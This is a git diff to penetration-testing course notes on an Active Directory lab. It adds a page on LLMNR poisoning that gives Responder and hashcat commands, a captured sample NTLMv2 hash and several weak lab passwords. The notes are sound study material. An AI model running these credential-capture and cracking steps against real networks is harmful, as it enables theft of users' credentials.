diff --git a/peh/4-active-directory/.gitbook/assets/1NdU4kfgwv6vgWRmsCZ1BXA.png b/peh/4-active-directory/.gitbook/assets/1NdU4kfgwv6vgWRmsCZ1BXA.png deleted file mode 100644 index 67c1f78..0000000 Binary files a/peh/4-active-directory/.gitbook/assets/1NdU4kfgwv6vgWRmsCZ1BXA.png and /dev/null differ diff --git a/peh/4-active-directory/.gitbook/assets/2024-07-28_21-48-50_660.png b/peh/4-active-directory/.gitbook/assets/2024-07-28_21-48-50_660.png new file mode 100644 index 0000000..67d2cec Binary files /dev/null and b/peh/4-active-directory/.gitbook/assets/2024-07-28_21-48-50_660.png differ diff --git a/peh/4-active-directory/.gitbook/assets/2024-07-28_21-59-11_661.png b/peh/4-active-directory/.gitbook/assets/2024-07-28_21-59-11_661.png new file mode 100644 index 0000000..92a35b3 Binary files /dev/null and b/peh/4-active-directory/.gitbook/assets/2024-07-28_21-59-11_661.png differ diff --git a/peh/4-active-directory/.gitbook/assets/ad-org.png b/peh/4-active-directory/.gitbook/assets/ad-org.png new file mode 100644 index 0000000..96b5d86 Binary files /dev/null and b/peh/4-active-directory/.gitbook/assets/ad-org.png differ diff --git a/peh/4-active-directory/.gitbook/assets/llmnr-overview.png b/peh/4-active-directory/.gitbook/assets/llmnr-overview.png new file mode 100644 index 0000000..ff2f82e Binary files /dev/null and b/peh/4-active-directory/.gitbook/assets/llmnr-overview.png differ diff --git a/peh/4-active-directory/1-ad-lab.md b/peh/4-active-directory/1-ad-lab.md index 50f756d..7145677 100644 --- a/peh/4-active-directory/1-ad-lab.md +++ b/peh/4-active-directory/1-ad-lab.md @@ -27,7 +27,7 @@ - Domain - `MARVEL.local` - **Active Directory Users and Computers** - Copy the `Administrator` user and create a second domain admin - - `tstark`:`yourpassword` + - `tstark`:`` - Copy the `Administrator` user and create a service account - `SQLService`:`MYpassword123#` - Create new users @@ -69,7 +69,7 @@ setspn -T MARVEL.local -Q */* - Reset password and enable local `Administrator`:`Password1!` - Add the domain users to the Administrators group - - `fcastle` for `THEPUNISHER` VM + - `fcastle` for `THEPUNISHER` VM - `fcastle` and `pparker` for `SPIDERMAN` VM - Go to Network and turn on `Network discovery and file sharing` diff --git a/peh/4-active-directory/2-ad-init-vectors.md b/peh/4-active-directory/2-ad-init-vectors.md index fce2438..a719cd9 100644 --- a/peh/4-active-directory/2-ad-init-vectors.md +++ b/peh/4-active-directory/2-ad-init-vectors.md @@ -1,2 +1,56 @@ # AD - Initial Attack Vectors +## [LLMNR Poisoning](https://tcm-sec.com/llmnr-poisoning-and-how-to-prevent-it/) + +➡️ **LLMNR** (Link-Local Multicast Name Resolution) protocol (NetBIOS / NBT-NS successor) allows hosts to perform name resolution for hosts on the same local network without requiring a DNS server. + +- When a host DNS query fails -> the host broadcast an LLMNR query across the local network + - An attacker can listen for these queries and respond to them with its IP to redirect traffic, leading to relay attacks and credentials theft (username & NTLM hash) + +![LLMNR Posoning - tcm-sec.com](.gitbook/assets/llmnr-overview.png) + + + +### Responder + +➡️ [Responder](https://github.com/lgandx/Responder) - LMNR, NBT-NS and MDNS poisoner + +- HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server +- Supports NTLMv1/NTLMv2/LMv2 with Extended Security NTLMSSP +- Built-in HTTP and HTTPS auth servers +- Built-in MSSQL auth server +- ... more ... + +```bash +sudo responder -I eth0 -dPv +``` + +- Login to `THEPUNISHER` VM with `fcastle` user and try to open WinExplorer and navigate to `\\192.168.31.131` (Kali IP) +- An event occurs and triggers LLMNR + - victim's username and password NTLMv2 hash received + + +![](.gitbook/assets/2024-07-28_21-48-50_660.png) + +### NTLMv2 Crack + +- Save the hash into a `hashes.txt` file and try to crack it + +```bash +mkdir -p ~/tcm/peh/ad-attacks +cd ~/tcm/peh/ad-attacks + +nano hashes.txt +# Paste the entire hash here +# e.g. +fcastle::MARVEL:326a2463163fdc3c:F7960DB37F933089E086898EC14E6C78:01010000000000008056A8C737E1DA012259B2C298FAD80B00000000020008004400530035004E0001001E00570049004E002D0058004B00300049004C0054004B0049004B004200560004003400570049004E002D0058004B00300049004C0054004B0049004B00420056002E004400530035004E002E004C004F00430041004C00030014004400530035004E002E004C004F00430041004C00050014004400530035004E002E004C004F00430041004C00070008008056A8C737E1DA0106000400020000000800300030000000000000000100000000200000904D97995337C0F1A56FEF978A82D6E80397E74EE021151E600DB10AC038DF7B0A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00330031002E003100330031000000000000000000 + +# Run hashcat +hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt +hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt --show +``` + +![Cracked password](.gitbook/assets/2024-07-28_21-59-11_661.png) + +--- + diff --git a/peh/4-active-directory/README.md b/peh/4-active-directory/README.md index ff00614..a3ca0f7 100644 --- a/peh/4-active-directory/README.md +++ b/peh/4-active-directory/README.md @@ -4,7 +4,7 @@ 🪟 **Active Directory** (**AD**) is a directory service developed by Microsoft for Windows domain networks. It provides directory services for managing Windows-based computers on a network. AD stores information about objects such as users, groups, computers, and other resources, and provides authentication and authorization services. -![Active Directory - academy.hackthebox.com](.gitbook/assets/1NdU4kfgwv6vgWRmsCZ1BXA.png) +![Active Directory - academy.hackthebox.com](.gitbook/assets/ad-org.png) ---